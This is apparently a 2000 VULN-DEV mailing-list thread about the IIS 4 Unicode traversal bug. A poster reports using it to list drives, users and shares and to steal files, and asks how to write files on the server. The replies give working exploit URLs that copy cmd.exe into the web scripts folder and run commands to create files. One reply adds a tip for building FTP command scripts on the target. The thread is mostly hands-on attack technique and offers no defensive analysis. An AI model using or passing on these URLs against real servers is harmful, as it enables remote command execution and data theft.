Re: dos commands via iis 4

[Unicraft Systems <unicraft () OTERO CL>]

However...
If your are building a text file to make use of an FTP command with the -s
option... the string should be this way
http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+echo+hack
> file.txt

Leaving a space (using a +) between the text and the ">" will cause the FTP
command not to function when it retrieves the information from the file.

My $0.02

Regards,
Gabriel Aguilera

-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of [ K o S
a K ]
Sent: Thursday, November 09, 2000 10:21 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: dos commands via iis 4

To create a file :

First copy \winnt\system32\cmd.exe in /inetpub/scripts/
http://www.site.com/scripts/..%c0%af/winnt/system32/cmd.exe?/c+copy+..\..\wi
nnt\system32\cmd.exe+cmd2.exe

Then Run :
http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+echo+hack
+>file.txt

now dir,  your file is created.

[ KoSaK ]








----- Original Message -----
From: "booboo" <booboo () 65535 COM>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Thursday, November 09, 2000 12:21 PM
Subject: dos commands via iis 4


> Dear Guys,
> I have been playing around with the latest iis unicode bug using
> the ..%c0%af.. strings and have had some success. I have been able to get
> directory listings of all the drives, lists of users and shares and steal
> files etc.. However, I have not been able to create files. I have been
> trying to use 'type'with re-directs but it does not seem to like the
> re-direct symbols. I have tried in quotation marks and using hex but no
> luck. Does anyone know how to do it.. or has an alternative..
>
> This is just for testing. Any help appreciated.
>
> BooBoo